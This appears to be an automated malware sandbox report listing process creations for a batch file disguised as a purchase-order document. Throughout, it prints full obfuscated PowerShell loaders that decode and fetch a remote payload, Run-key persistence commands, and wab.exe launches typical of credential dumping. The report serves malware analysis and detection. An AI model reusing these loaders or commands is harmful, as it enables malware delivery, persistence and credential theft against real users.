Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H 